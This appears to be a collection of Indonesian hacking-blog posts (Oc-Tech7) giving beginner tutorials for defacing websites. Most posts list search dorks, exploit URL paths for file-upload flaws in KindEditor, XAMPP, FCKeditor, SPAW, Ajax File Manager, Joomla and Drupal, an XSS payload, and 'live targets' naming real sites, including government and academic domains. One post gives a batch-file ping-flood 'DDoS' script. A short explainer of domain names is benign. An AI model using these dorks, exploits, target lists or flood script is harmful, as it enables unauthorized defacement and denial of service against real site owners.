Deface Kindeditor

Hae bertemu lagi dengan testa di Oc-Tech7. Kali ini testa akann share cara deface Poc Kindeditor. Menurut testa poc ini sangat gampang dan sangat cocok bagi pemula, karena cuman memakan waktu 1 menit doang. Okey langsung saja gan.

1. Bahan :

1. script deface
2. internet
3. pc/hp

2. Dork :

• inurl:examples/uploadbutton.html
• inurl:kindeditor

3. Langkah-langkah :

• Pertama, kita dorking dulu menggunakan salah satu dork diatas.

• Kedua, kita pilih salah satu target. kalau muncul seperti ini berarti targetnya vuln (Cek gambar dibawah).

• ketiga, klik tombol upload dan pilih script deface kamu di filemanager kamu.
• keempat, kita copy exploit yang terdapat dalam kolom.

lalu kita tempel dibelakang site

contoh :

http://www.diandingding.com/

lalu tempel dibelakangnya, jadi seperti ini :

http://www.diandingding.com/Public/Admin/KindEditor/attached/file/20180528/20180528133236_95881.html

• Dan taraaa, kalian dah bisa deface :)

4. Live target :

• http://www.diandingding.com/Public/Admin/KindEditor/examples/uploadbutton.html
• http://www.nb-medicalsystem.com/kindeditor/examples/uploadbutton.html
• http://mmedi.cc/Public/js/kindeditor/examples/uploadbutton.html
• http://www.mtcbus.com.tw/Public/Js/kindeditor/examples/uploadbutton.html

5. Tutorial Dalam Video

Sekian dulu gan, Kalo ada yang mau ditanyakan comment sadja.

Author : Oc-Tech7

Deface Priv8 SCR

Hae bertemu lagi dengan testa di Oc-Tech7. Kalii ini testa akan share cara deface poc Priv8 SCR. Metode / poc ini sama persis kayak poc Xampp Local Write Access, yaitu kagak perlu upload. Okey langsung saja :

1. Bahan-bahan

• Internet
• Hp/Pc

2. Dork :

• inurl:config/config.izo

3. Langkah-langkah :

• Pertama, kita dorking dengan dork diatas.
• Kedua, pilih salah satu web.

Kalo vuln akan muncul seperti ini :

• Lalu kalian isi kolomnya

Kolom besar isi nama team kamu atau apa saja.

Kolom kecil isi "Hacked By Nick kamu"

Contoh :

• Kalo udah diisi kolomnya, kalian klik Hajar!
• Lalu tambahkan exploit /config/tar.tmp di belakang web

contoh : http://testatamvan.tq/config/tar.tmp

dan tara sekarang muncul nick kamu :V

4. Live target :

• http://coloredlion.com/
• http://www.arthub.com.au/
• http://www.pa-cirebon.go.id/
• http://www.kirtasiyeofisi.com.tr/
• http://www.ortakoytarim.com.tr/

Note : Tambahkan dulu exploit /config/config.izo buat live target.

Contoh :
http://coloredlion.com/config/config.izo

5. Tutorial Video :

Sekian dulu gan :V
Kalo ada yang kurang ngerti bisa comment :V

Author : Oc-Tech7

Domain

Hae semua!. Bertemu lagi dengan testa di Oc-Tech7. sekarang testa akan menjelaskan tentang definisi, fungsi, dan nama-nama domain :V Okey lagsung saja.

• Definisi Domain

Domain adalah nama unik yang diberikan untuk mengidentifikasi nama server komputer seperti web server atau email server di jaringan komputer ataupun internet.

• Fungsi Domain

Fungsi Domain adalah untuk mempermudah pengguna di internet pada saat melakukan akses ke server, selain juga dipakai untuk mengingat nama server yang dikunjungi tanpa harus mengenal deretan angka yang rumit yang dikenal sebagai IP address. Nama domain kadang-kadang disebut pula dengan istilah URL, atau alamat website. Dengan domain kita bisa tahu situs negara manakah yang kita kunjungin, contoh situs yang berdomain .id berarti situs indonesia, situs yang berdomain .my berarti situs negara malaysia dan lain-lain. untuk nama-nama domain yang lengkap kalian bisa cek dibawah.

• Berikut adalah nama nama domain beserta fungsinya :

1. gov atau go – Digunakan Untuk Untuk Pemerintahan.
2. edu – Digunakan Untuk Institusi pendidikan.
3. ac -- Digunakan untuk academi.
4. org – Digunakan Untuk Organisasi / Kegiatan Nonprofit.
5. mil – Digunakan Untuk Militer.
6. com – Digunakan Untuk Organisasi Profit / Komersial.
7. net – Digunakan Untuk Organisasi Network.
8. name – Digunakan untuk personal / keluarga..
9. tv – Digunakan Untuk Pertelevisian.
10. info – Digunakan Untuk kepentingan Informasi.
11. biz – Digunakan Untuk Kepentingan Bisnis.
12. travel – Digunakan Untuk Pariwisata.
13. xxx – Digunakan untuk Hiburan Dewasa (Pornografi)

Dan masih banyak lagi.

Agar informasi tentang domain lebih lengkap, berikut testa lampirkan daftar domain dan negaranya.

1. .ac – Ascension
2. .ad – Andorra
3. .ae – Uni Emirat Arab
4. .af – Afganistan
5. .ag – Antigua dan Barbuda
6. .ai – Anguilla
7. .al – Albania
8. .am – Armenia
9. .an – Antillen Belanda
10. .ao – Angola
11. .aq – Antartika
12. .ar – Argentina
13. .as – Samoa Amerika
14. .at – Austria
15. .au – Australia
16. .aw – Aruba
17. .ax – Åland
18. .az – Azerbaijan
19. .ba – Bosnia Herzegovina
20. .bb – Barbados
21. .bd – Bangladesh
22. .be – Belgia
23. .bf – Burkina Faso
24. .bg – Bulgaria
25. .bh – Bahrain
26. .bi – Burundi
27. .bj – Benin
28. .bm – Bermuda
29. .bn – Brunei Darussalam
30. .bo – Bolivia
31. .br – Brasil
32. .bs – Bahama
33. .bt – Bhutan
34. .bv – Pulau Bouvet
35. .bw – Botswana
36. .by – Belarus
37. .bz – Belize
38. .ca – Kanada
39. .cc – Pulau Cocos
40. .cd – Republik Demokratik Kongo (dulunya .zr – Zaire)
41. .cf – Republik Afrika Tengah
42. .cg – Republik Kongo
43. .ch – Swiss
44. .ci – Côte d’Ivoire (Pantai Gading)
45. .ck – Kepulauan Cook
46. .cl – Chili
47. .cm – Kamerun
48. .cn – Republik Rakyat Cina
49. .co – Kolombia
50. .cr – Kosta Rika
51. .cs – Serbia dan Montenegro
52. .cu – Kuba
53. .cv – Tanjung Verde
54. .cx – Pulau Natal
55. .cy – Siprus
56. .cz – Republik Ceko
57. .de – Jerman
58. .dj – Djibouti
59. .dk – Denmark
60. .dm – Dominika
61. .do – Republik Dominika
62. .dz – Aljazair (Algeria)
63. .ec – Ekuador
64. .ee – Estonia
65. .eg – Mesir
66. .eh – Sahara Barat (tidak dipakai; tidak ada DNS)
67. .er – Eritrea
68. .es – Spanyol
69. .et – Ethiopia
70. .eu – Uni Eropa (kode domain yang “dikhususkan” oleh ISO 3166-1)
71. .fi – Finlandia
72. .fj – Fiji
73. .fk – Kepulauan Falkland
74. .fm – Federasi Mikronesia
75. .fo – Kepulauan Faroe
76. .fr – Perancis
77. .ga – Gabon
78. .gb – Britania Raya (Reserved domain by IANA; deprecated – see .uk)
79. .gd – Grenada
80. .ge – Georgia
81. .gf – Guyana Perancis
82. .gg – Guernsey
83. .gh – Ghana
84. .gi – Gibraltar
85. .gl – Greenland
86. .gm – Gambia
87. .gn – Guinea
88. .gp – Guadeloupe
89. .gq – Guinea Khatulistiwa
90. .gr – Yunani
91. .gs – Georgia Selatan dan Kepulauan Sandwich Selatan
92. .gt – Guatemala
93. .gu – Guam
94. .gw – Guinea Bissau
95. .gy – Guyana
96. .hk – Hong Kong
97. .hm – Pulau Heard dan Kepulauan McDonald
98. .hn – Honduras
99. .hr – Kroasia
100. .ht – Haiti
101. .hu – Hongaria
102. .id – Indonesia
103. .ie – Republik Irlandia
104. .il – Israel
105. .im – Pulau Man
106. .in – India
107. .io – Teritori Samudra Hindia Britania
108. .iq – Irak
109. .ir – Iran
110. .is – Islandia
111. .it – Italia
112. .je – Jersey
113. .jm – Jamaika
114. .jo – Yordania
115. .jp – Jepang
116. .ke – Kenya
117. .kg – Kirgizstan
118. .kh – Kamboja
119. .ki – Kiribati
120. .km – Komoro
121. .kn – Saint Kitts dan Nevis
122. .kp – Korea Utara (tidak dipakai; tidak ada DNS)
123. .kr – Korea Selatan
124. .kw – Kuwait
125. .ky – Kepulauan Cayman
126. .kz – Kazakhstan
127. .la – Laos
128. .lb – Lebanon
129. .lc – Saint Lucia
130. .li – Liechtenstein
131. .lk – Sri Lanka
132. .lr – Liberia
133. .ls – Lesotho
134. .lt – Lituania
135. .lu – Luxemburg
136. .lv – Latvia
137. .ly – Libya
138. .ma – Maroko
139. .mc – Monako
140. .md – Moldova
141. .me – Montenegro
142. .mg – Madagaskar
143. .mh – Kepulauan Marshall
144. .mk – Republik Makedonia
145. .ml – Mali
146. .mm – Myanmar
147. .mn – Mongolia
148. .mo – Makau
149. .mp – Kepulauan Mariana Utara
150. .mq – Martinique
151. .mr – Mauritania
152. .ms – Montserrat
153. .mt – Malta
154. .mu – Mauritius
155. .mv – Maladewa
156. .mw – Malawi
157. .mx – Meksiko
158. .my – Malaysia
159. .mz – Mozambik
160. .na – Namibia
161. .nc – Kaledonia Baru
162. .ne – Niger
163. .nf – Pulau Norfolk
164. .ng – Nigeria
165. .ni – Nikaragua
166. .nl – Belanda (ccTLD terdaftar pertama)
167. .no – Norwegia
168. .np – Nepal
169. .nr – Nauru
170. .nu – Niue
171. .nz – Selandia Baru
172. .om – Oman
173. .pa – Panama
174. .pe – Peru
175. .pf – Polinesia Perancis
176. .pg – Papua Nugini
177. .ph – Filipina
178. .pk – Pakistan
179. .pl – Polandia
180. .pm – Saint-Pierre dan Miquelon
181. .pn – Kepulauan Pitcairn
182. .pr – Puerto Riko
183. .ps – Otoritas Nasional Palestina
184. .pt – Portugal
185. .pw – Palau
186. .py – Paraguay
187. .qa – Qatar
188. .re – Réunion
189. .ro – Rumania
190. .rs – Serbia
191. .ru – Rusia
192. .rw – Rwanda
193. .sa – Arab Saudi
194. .sb – Kepulauan Solomon
195. .sc – Seychelles
196. .sd – Sudan
197. .se – Swedia
198. .sg – Singapura
199. .sh – Saint Helena
200. .si – Slovenia
201. .sj – Svalbard dan Jan Mayen (tidak dipakai; tidak terdaftar)
202. .sk – Slowakia
203. .sl – Sierra Leone
204. .sm – San Marino
205. .sn – Senegal
206. .so – Somalia
207. .sr – Suriname
208. .st – Sao Tome dan Principe
209. .su – Uni Soviet (terdepresiasi; digantikan; kode domain “dipakai untuk pergantian” oleh ISO 3166-1)
210. .sv – El Salvador
211. .sy – Suriah
212. .sz – Swaziland
213. .tc – Kepulauan Turks dan Caicos
214. .td – Chad
215. .tf – Teritorial Perancis Selatan
216. .tg – Togo
217. .th – Thailand
218. .tj – Tajikistan
219. .tk – Tokelau
220. .tl – Timor Leste
221. .tm – Turkmenistan
222. .tn – Tunisia
223. .to – Tonga
224. .tp – Timor Timur (terdepresiasi – gunakan .tl; kode domain “dipakai untuk pergantian” oleh ISO 3166-1)
225. .tr – Turki
226. .tt – Trinidad dan Tobago
227. .tv – Tuvalu
228. .tw – Republik Cina (Taiwan)
229. .tz – Tanzania
230. .ua – Ukraina
231. .ug – Uganda
232. .uk – Inggris (kode domain yang “dikhususkan” oleh ISO 3166-1) (lihat pula .gb)
233. .us – Amerika Serikat
234. .uy – Uruguay
235. .uz – Uzbekistan
236. .va – Vatikan
237. .vc – Saint Vincent dan Grenadines
238. .ve – Venezuela
239. .vg – Kepulauan Virgin Britania Raya
240. .vi – Kepulauan Virgin Amerika Serikat
241. .vn – Vietnam
242. .vu – Vanuatu
243. .wf – Wallis dan Futuna
244. .ws – Samoa (dulunya Samoa Barat)
245. .ye – Yaman
246. .yt – Mayotte
247. .yu – Yugoslavia
248. .za – Afrika Selatan
249. .zm – Zambia
250. .zw – Zimbabwe

Untuk Indonesia terbagi menjadi beberapa sub domain seperti :

1. ac.id : Jenis domain yang digunakan bagi lingkungan akademik/perguruan tinggi dengan ketentuan dan kebijakan yang telah ditentukan.
2. co.id : Jenis domain yang digunakan bagi organisasi komersial yang pada ketentuan dan kebijakan selanjutnya hanya diperuntukan bagi perusahaan dengan ketentuan dan kebijakan yang telah ditentukan.
3. or.id : Jenis domain yang digunakan bagi organisasi selain organisasi yang masuk kedalam kategori domain ac.id, co.id, net.id, go.id, mil.id, sch.id, dst dengan ketentuan dan kebijakan yang telah ditentukan.
4. net.id : Jenis domain yang digunakan bagi organisasi pemegang Izin Penyelenggara jasa telekomunikasi dengan ketentuan dan kebijakan yang telah ditentukan.
5. web.id : Jenis domain yang digunakan bagi personal dan organisasi dengan ketentuan dan kebijakan yang telah ditentukan.
6. sch.id : Jenis domain yang digunakan bagi sekolah dengan ketentuan dan kebijakan yang telah ditentukan.
7. go.id : Jenis domain yang digunakan khusus bagi instansi pemerintah dengan ketentuan dan kebijakan yang telah ditentukan.
8. mil.id : Jenis domain yang digunakan bagi kalangan militer dengan ketentuan dan kebijakan yang telah ditentukan.
9. war.net.id Jenis domain yang digunakan bagi warung internet dengan ketentuan dan kebijakan yang telah ditentukan.

Itulah beberapa definisi, fungsi dan nama-nama domain yang bisa testa sempaikan.
Kalo ada yang mau ditanyakan bisa comment saja.

Author : Oc-Tech7

Deface Xampp Local Write Access

Hae, Bertemu lagi dengan testa di Oc-Tech7. Kali ini testa akan share Deface poc Xampp Local Write Access. Langsung aja gan.

1. Bahan :

• Internet
• Hp/pc

2. Dork :

  1) inurl:/xampp/lang.php

  2) inurl:/security/lang.php

  3) inurl:/xampp/splash.php

  4) inurl:xampp/index.php intitle:XAMPP

kembangin lagi gan.

3. Exploit :

• /xampp/lang.php?Hacked_By_N-Kun7  (untuk path /xammp atau dork no 1,3,4)
•  /security/lang.php?Hacked_By_N-Kun7   (untuk path /security atau dork no 2)

Note : Pada Nicknya bisa kalian ganti saja dengan nick kalian masing masing.

4. Langkah-langkah :

• Pertama, kita dorking dulu.
• Kedua, kita pilih salah satu web. Kalo vuln biasanya berwarna oren. Cek gambar dibawah :

• Ketiga, masukan exploitnya dibelakang web.

Contoh :

https://testatamvan.tq/xampp/lang.php?Hacked_By_N-Kun7

Kalo berhasil maka akan ada tulisan seperti ini :

• Keempat, kita tambahkan exploit dibawah ini dibelakang web tadi.

1. /xampp/lang.tmp
2. /security/lang.tmp

Note : Untuk exploit bisa disesuaikan dengan path.

Contoh:

https://testatamvan.tq/xampp/lang.tmp

Maka akan muncul nick kamu :*

5. Demo :

1. http://122.53.86.121/xampp/lang.tmp
2. http://www.colorin.com.ar/security/index.php
3. https://help.precisionit.net/xampp/lang.tmp
4. http://bls.dyndns-office.com/security/lang.tmp
5. http://www.tb-steiner.at/security/lang.tmp
6. http://imalys.com/security/lang.tmp
7. http://revolution-x.net//security/lang.tmp
8. https://umpwr.ac.id/security/lang.tmp

Note : Masukin dulu exploitnya.

6. Tutorial video :

Sekian dulu ea :V

Kalo ada yang kurang ngerti bisa Comment saja :*

Author : Oc-Tech7

Deface XSS Vulnerability

Hae, bertemu lagi dengan testa di Oc-Tech7. Kali ini testa akan share tutor deface poc XSS Vulnerability. Sebelumnya testa akan menjelaskan apa itu XSS. XSS merupakan kependekan yang digunakan untuk istilah Cross Site Scripting. XSS merupakan salah satu jenis serangan injeksi code. XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs.

Okey langsung sadja

1. Bahan :

1. Internet
2. HP/PC

2. Dork :

1. inurl:"/showcatrows.php?CategoryID=

3. Exploit :

1. "><marquee><h1>Hacked By nick kamu ( Nama team kaamu )</h1></marquee>

4. Langkah-langkahnya

• Pertama, Dorking  dulu menggunakan dork diatas.
• Kedua, Pilih salah satu web.
• Ketiga, Maksukan  Exploit  diatas dibelang pathnya.

contoh  :
Sebelum :

• http://www.paypalshop.org/showcatrows.php?CategoryID=5"

Sesudah :

• http://www.paypalshop.org/showcatrows.php?CategoryID=5%22%3E%3Cmarquee%3E%3Ch1%3EHacked%20By%20N-Kun7%20(%20Oc-Tech7%20)%3C/h1%3E%3C/marquee%3E

Kalo berhasil akan muncul seperti ini

5. Live terget :

1. http://www.paypalshop.org/showcatrows.php?CategoryID=5"

6. Tutorial video :

Okey Sekian dulu :V

Kalo ada yang tidak dimengerti comment saja :*

Author : Oc-Tech7

Deface Com_media

Yosh, bertemu lagi dengan testa di Oc-Tech7. Kali ini testa akan share cara deface menggunakan metode Com_media. Poc ini sama seperti poc Messange Board Forum, yaitu hanya bisa upload script txt saja. Tapi walaupun begitu lumayan lah buat nambah skill dan pengalaman. Okey langsung saja.

1. Bahan-bahan :

1. Script deface txt
2. Internet
3. Hp/Pc 

2. Dork :

1. inurl:index.php?option=com_media (harus pake exploit)
2. inurl:com_media intitle:insert image intext:maximum ( dork tanpa exploit )

3. Exploit :

• index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

4. Langkah-langkah

• Pertama, kita dorking dulu menggunakan salah satu dork diatas.
• Kedua, pilih target.
• Ketiga, tambahkan exploit nya dibelakang web.

Contoh :

• https://www.oc-tech7.tk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Kalau vuln maka tampilannya akan seperti ini (ada tempat uploadnya) :

• Ketiga, kalian isi semua kolomnya, untuk folder kalian pilih ( / ) dan upload script txt nya. Cek gambar diatas.
• Keempat, kalau berhasil upload maka akan muncul pesan. ( Cek gambar dibawah)

• Kelima, kalian panggil saja script nya. Scriptnya berada di site/images/namasc.txt

Contoh : http://eepliant.eu/images/007.txt

5. Live target :

• http://eepliant.eu/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

6. Tutorial Video

Sekian dulu gan. Semoga bermanfaat.
Kalo ada yang mau ditanyakan comment saja.
Subcribe chanel youtubenya gan.

Author : Oc-Tech7

Daface Messange Board Forum

Hae gan! Bertemu lagi dengan testa. Kali ini testa akan share cara deface poc messange board forum. Poc ini hanya bisa upload script txt aja, tapi kagak apa-apa, biar bisa nambah skill / pengalaman. Okey langsung saja :

1. Bahan :

• Internet
• Hp/Pc
• Script ext .txt

2. Dork :

1. inurl:"/forum.php?forumid=
2. Inurl:"/forum_topic_create.php?"

3. Langkah-langkah :

• Pertama, dorking dulu menggunakan salah satu dork diatas.
• Kedua, pilih salah satu web.
• Ketiga, Klik New topic. Lihat gambar dibawah.

•  Keempat, kalian isi kolom yang ada tanda (*) sadja. Cek gambar dibawah.

• Kelima, kalo udah diisi kolomnya, kalian klik post topic.
• Keenam, klik nama script kalian, cek gambar dibawah.

• Dan taraaaaa, Kalian telah berhasil :*

4. Live target :

http://www.phs1957.com/forum_topic.php

5. Tutorial Video

Sekian dulu gan.

Kalo ada yang kurang jelas comment aja.
Bantu Subcribe chanel youtubenya gan.

Author : Oc-Tech7

DDOS sederhana di pc

Hae, berjumpa lagi dengan testa di O-Tech7. Kali ini testa akan ngasih tutorial ddos di notepad. Sebelumnya testa akan jelaskan apa itu Ddos. Serangan DoS (denial-of-service attacks) adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

Oke langsung sadja gan.

1. Bahan-bahan

• Internet (internet penting buat ddos).
• Pc.
• Notepad

2. Langkah-langkah

• Pertama kita buka dulu notepad, dan tempel code dibawah ini :

@echo off
mode 67,16
title DDOS Attacking Server
color 0b
cls
echo =========================================
echo = Oc-Tech7 Ddos   =
echo =========================================
echo.
echo =========================================
echo = Author  : Oc-Tech7  =
echo = Website : www.oc-tech7.tk =
echo =========================================
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo *    Masukan IP / Host Target   *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

• Kedua, kita simpan kode diatas dengan extensi .bat . Lihat gambar dibawah :

Keterangan :

1. File Name     : Ddos.bat
2. Save as type  : all files

• Ketiga, kita buka program/file tadi. Lalu kita masukan ip dan packetnya, lalu klik enter.

• Selesai. 

Sekian dulu, mohon maaf kalo ada yang kurang jelas. 

Kalo ada yang kurang jelas bisa comment  aja.

Author : Oc-Tech7

Deface File Attachment Upload Repository

Hae, berjumpa lagi dengan testa. Kali ini testa akan memberikan tutor Deface poc File Attachment Upload Repository. Langsung saja.

1. Bahan :

1. Internet
2. PC/HP
3. Script ext .txt

2. Dork :

• inurl:/admin/modules/bibliography/pop_attach.php
• pustaka.*.go.id
• pustaka.*.ac.id
• pustaka.*.sch.id
• pustaka.*.(isi dengan domain yang kalian mau :v)

3.Exploit : /admin/modules/bibliography/pop_attach.php

4.Langkah-langkah :

• Pertama, kita dorking menggunakan salah satu dork diatas.
• Kedua, pilih salah satu target.
• Ketiga, masukan exploit diatas dibelang site/

contoh
http://library.stikessarimulia.ac.id/
Ditambah exploit menjadi :
http://library.stikessarimulia.ac.id/admin/modules/bibliography/pop_attach.php

• Keempat, kita isi namanya dan upload file.

Lalu klik "unggah sekarang".

• Kelima, kita panggil filenya, lokasi file : site/repository/yourfile.txt

contoh : http://library.stikessarimulia.ac.id/repository/011.txt

5. Live target :

• http://library.stikessarimulia.ac.id/admin/modules/bibliography/pop_attach.php

Selesai :V
Sekian dulu, kalo ada yang kurang mengerti comment saja.

Author : Oc-Tech7

Deface drupal hidden uploader

Hae selamat pagi, siang, malam, sore, pilih saja sendiri. Yo bertemu lagi dengan testa di Oc-Tech7. Kali ini testa akan share tutorial deface metode drupal hidden uploader. Metode ini lebih gampang dari metode ajax file manager karena cuman butuh waktu 1 menit saja. Okey langsung saja.

1. Bahan

• Script Deface ext html atau txt
• Internet
• Hp/Pc

2. Dork

• Allowed file types: jpg html txt. site:gov
• Allowed file types: jpg html txt. site:edu
• Allowed file types: jpg html txt. site:ac
• Allowed file types: jpg html txt. site:(domain negara yang anda inginkan)

3. Langkah-langkah :

• Pertama, kalian dorking dulu menggunakan salah satu dork diatas.
• Kedua, pilih salah satu target. Kalo vuln akan muncul tempat upload (cek gambar dibawah)

• Ketiga, kalian upload saja script deface dengan ext .html, kalo gagal kalian upload aja dengan ext .txt
• Keempat, setelah kalian berhasil upload scriptnya maka akan muncul nama script deface kalian (cek gambar dibawah).

• Kelima, kalian klik aja nama script kalian. 
• Dan taraaa kalian telah bisa menggunakan poc ini.

5. Live target :

• http://www.viterbo.edu/copy-and-mail-center/online-copy-form

Sekian dulu gan :V
Kalo ada yang kurang ngerti, atau ada tulisan typo atau gambar rusak comment saja :)

Author : Oc-Tech7

Deface spaw file manager

Hae!!! Bertemu lagi dengan testa di Oc-Tech7. Pada pertemuan kali ini testa akan share cara deface poc SPAW file manager. Poc ini sama kayak FckEditor, Karena cuman upload script saja. Okey langsung saja.

1. Bahan-bahan :

• Script Deface ext .html dan .txt
• Internet
• Hp/PC

2. Dork

•  inurl:Spaw2/dialogs/
•  Inurl:spaw2/uploads/files
•  Index of:/Spaw2/uploads/files

3. Exploit :

/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=

4. Langkah-langkah

• Pertama, kita dorking dulu menggunakan salah satu dork diatas.
• Kedua, kita pilih salah satu web dan tambahkan exploit dibelakang site/ 

Contoh :

• Https://testatamvan.tq/spaw2/upload/files

Lalu kita tambahkan exploitnya, menjadi

• Https://testatamvan.tq/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=

Kalo vuln nanti bakalan kayak gambar dibawah.

• Ketiga, kita setting dulu. Samakan kayak yg diatas (yang ditandai nomer 1)
• Keempat kita upload scriptnya (cek gambar diatas nomer 2) 

Note : Kagak semuanya vuln upload html

• Kelima, Kita panggil scriptnya, caranya dengan menambahkan exploit dibelakang path / site :

/spaw2/uploads/files/namascript

/spaw2/upload/files/namascript

Contoh :

• http://www.wholehealthamerica.com/spaw2/uploads/files/007.txt

Selesai gan.

5. Live target

• http://www.wholehealthamerica.com/spaw2/

Note : Tambahkan dulu exploitnya

6. Tutorial video

Sekian dulu gan, kalo ada yang kurang ngerti comment aja :*

Author : Oc-Tech7

Deface Ajax File Manager

Hae sahabat Oc-Tech7. Kali ini testa akan share cara deface poc ajax file manager. Poc ini bisa dibilang mudah, karena cuman upload script saja. Okey langsung saja gan.

1. Bahan :

1. Script deface ext .html dan .txt
2. Internet
3. Hp/PC

2. Dork

• intitle:"Ajax File Manager" site:vn
• inurl:/ajaxfilemanager.php intext:"/Root Folder"
• inurl:/ajaxfilemanager.php intext:"upload"
• inurl:/ajaxfilemanager.php site:au
• intitle:"index of" intext:"ajaxfilemanager.php"

Note : site: boleh di ganti dengan domain yang lain atau di hapus.

3. Langkah-langkah :

• Pertama, kita dorking dulu menggunakan salah satu dork diatas.
• Kedua, piih salah satu web. Kalo vuln maka akan ada tombol upload (cek gambar dibawah)

• Ketiga, kita upload saja scriptnya, caranya klik choose file/pilih file. cek gambar diatas.
• Keempat, kalo udah di upload, sekarang kalian cari file yang tadi diupload. lalu klik kanan icon kertas warna biru dan salin url nya. (cek gambar dibawah)

• Dan taraaaa. halamannya dah berubah.

4. Live target :

• http://www.trihaus.com/assets/newsletter/assets/a7d0f88b/plugins/ajaxfilemanager/ajaxfilemanager.php
• http://achievement2007.co.in/savsoft/editor/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
• http://zenplaza.com.vn/public/scripts/tinymce_/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

5. Tutorial dalam video :

Sekian dulu gan!!!

Kalo ada yang kurang ngerti comment sadja :*

Author : Oc-Tech7

Deface Fckeditor

Hae Sahabat Oc-Tech7. Kembali lagi dengan saya angelo testa. Kali ini testa mau kasih tutorial deface poc FckEditor. Poc ini sangat sederhana, kurang lebih memakan waktu 2menit doang. Okey langsung saja.

1. Bahan-bahan :

1. Internet
2. HP/PC
3. Script deface

2. Dork :

• inurl:advert_detail.php?id=

3. Exploit :

• /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

4. Langkah-langkah :

• Pertama, kita dorking dulu menggunakan dork diatas.
• Kedua, pilih salah satu web.
• Ketiga, masukan exploitya dibelakang site.

Contoh :

• Https://testatamvan.tq/ 

Lalu kyta masukan exploitnya, menjadi :

• Https://testatamvan.tq/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

Kalo vuln maka akan seperti ini (cek gambar dibawah).

• Keempat, upload script kamu, caranya klik choose file (pilih file) yang ada dibawah lalu klik upload. cek aja gambar diatas

Letak filemu? filenya berada di web/files/namasc.html
contoh:

Https://testatamvan.tq/files/01.html

• Dan taraaaaa!!! Kalian dah bisa :* unchhh

5. Live target :

http://sonsuzemlak.com

http://www.barbarosalagoz.com

http://www.nmgayrimenkul.com

http://www.cetindagemlak.com

Note : Untuk live target masukan dulu exploitya!!!

6. Tutorial dalam video :

Sekian dulu. Kalo ada yang mau ditanyakan comment sadja :*
Jangan lupa kunjungin terus ya :)

Author : Oc-Tech7

Intro

Selamat datang di website Oc-Tech7

Oc-Tech7 adalah website yang membahas seputar dunia teknologi atau yang sering disebut IT, seperti Hacking, Coding, Exploit, Tools online/offline, Android, Pc, Website and blog, tips and trick, Info Teknologi, Berita terkini dan lain-lain. Oc-Tech7 Berdiri sejak 7 Mei, 2018.

Disini kalian bisa belajar dan bertanya seputar dunia teknologi.

Contact :

• Facebook
• Email